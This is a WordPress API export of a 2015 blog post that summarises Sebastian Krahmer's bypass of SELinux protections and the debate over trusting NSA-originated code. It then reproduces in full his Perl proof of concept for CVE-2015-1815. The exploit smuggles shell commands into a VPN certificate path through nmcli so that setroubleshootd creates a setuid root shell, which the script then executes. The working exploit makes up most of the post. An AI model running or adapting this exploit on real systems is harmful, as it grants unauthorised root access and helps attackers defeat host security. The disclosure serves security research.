{"id":659,"date":"2015-03-30T07:50:46","date_gmt":"2015-03-30T07:50:46","guid":{"rendered":"http:\/\/www.selinuxplus.com\/?p=659"},"modified":"2015-03-30T08:02:34","modified_gmt":"2015-03-30T08:02:34","slug":"selinux%e9%98%b2%e5%be%a1%e8%a2%ab%e8%bd%bb%e6%98%93%e7%bb%95%e8%bf%87","status":"publish","type":"post","link":"http:\/\/www.selinuxplus.com\/?p=659","title":{"rendered":"SELinux defenses easily bypassed?"},"content":{"rendered":"<p>&#8220;Sebastian Krahmer, a security researcher at the GNU\/Linux vendor SuSE, successfully bypassed SELinux's whitelist rules; Sebastian analyzed the exploitation method and published a PoC. Under the targeted policy, the community maintainers assume things are safe and therefore let some programs run with root privileges; perhaps this is exactly what the NSA hoped to see ;-)<br 
\/>\nSELinux, the well-known open-source implementation of MAC (mandatory access control), is a project started by the NSA (the US National Security Agency) in the late 1990s; its source code was released in 2000 under the GPL free software license and merged into the Linux kernel in 2003. Over the past 10 years the debate over whether the NSA put a backdoor in it has never stopped: some people think SELinux should be trusted because its source code is public under the GPL free software license, while others think it is a project the NSA took part in and therefore should not be trusted. After Snowden exposed PRISM in 2013, even more people deeply distrust the NSA, believing that the NSA has a record of planting backdoors in Android code, so every project the NSA actively participates in, including SELinux, should be viewed with suspicion. Among the current open-source MAC implementations, SELinux is mainly maintained by the RedHat\/CentOS\/Fedora community and AppArmor mainly by the OpenSuSE\/Ubuntu community, while PaX\/Grsecurity, known for defense in depth, has to date, for various reasons such as vendor interests and community politics, never made it into the Linux mainline even though many operating systems (Linux\/Windows\/OSX) have copied from it.&#8221;<\/p>\n<p>https:\/\/github.com\/stealth\/troubleshooter<\/p>\n<pre class=\"lang:default decode:true \" >#!\/usr\/bin\/perl\r\n\r\n# Fedora21 setroubleshootd local root PoC (CVE-2015-1815)\r\n#\r\n# requires polkit authorization to 
add\/mod VPN connections\r\n# to NetworkManager (default on desktop user)\r\n#\r\n# I say: lulz!\r\n#\r\n# (C) 2015 Sebastian Krahmer\r\n#\r\n#\r\n# create a pathname that setroubleshootd will eventually\r\n# query sh -c { rpm -qf ... with, fucking up ' escaping. So the\r\n# embedded pathname is then evaluated as command\r\n#\r\n# There goes your NSA-grade SELinux security.\r\n\r\n#$command = \"id|logger\";\r\n\r\n# full blown rootshell to disable SELinux\r\n$command=\"cd var;cd lib;cd setroubleshoot;cat \\$SHELL &gt; sh;chmod 04755 sh\";\r\n$boomsh = \"\/var\/lib\/setroubleshoot\/sh\";\r\n\r\n$file = \"\/tmp\/7350.pem';$command;echo '\";\r\nopen(O, \"&gt;\", $file) or die $!;\r\nclose O;\r\n\r\n# add connection\r\nsystem(\"nmcli c add type vpn ifname FOOBAR vpn-type openvpn\");\r\nopen(O,\"|nmcli c edit vpn-FOOBAR\") or die $!;\r\n\r\nprint O \"set vpn.data ca = \/tmp\/7350.pem';$command;echo ', password-flags = 1, connection-type = password, remote = 1.2.3.4, username = FOOBAR\\n\";\r\nprint O \"set vpn.secrets password=1\\nsave\\nquit\\n\";\r\nclose(O);\r\n\r\nprint \"[*] Triggering vulnerability for boomsh ...\\n\";\r\n\r\nwhile (((stat($boomsh))[2] &amp; 04000) != 04000) {\r\n\tsystem(\"nmcli c up vpn-FOOBAR\");\r\n\tsleep(10);\r\n}\r\n\r\nprint \"\\n[!] Found boomsh mode 04755! 
Domains dont contain!\\n\";\r\nexec($boomsh, \"-p\");<\/pre>\n","protected":false},"excerpt":{"rendered":"<p>&#8220;Sebastian Krahmer, a security researcher at the GNU\/Linux vendor SuSE&hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[3],"tags":[179],"_links":{"self":[{"href":"http:\/\/www.selinuxplus.com\/index.php?rest_route=\/wp\/v2\/posts\/659"}],"collection":[{"href":"http:\/\/www.selinuxplus.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.selinuxplus.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.selinuxplus.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.selinuxplus.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=659"}],"version-history":[{"count":2,"href":"http:\/\/www.selinuxplus.com\/index.php?rest_route=\/wp\/v2\/posts\/659\/revisions"}],"predecessor-version":[{"id":661,"href":"http:\/\/www.selinuxplus.com\/index.php?rest_route=\/wp\/v2\/posts\/659\/revisions\/661"}],"wp:attachment":[{"href":"http:\/\/www.selinuxplus.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=659"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.selinuxplus.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=659"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.selinuxplus.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=659"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}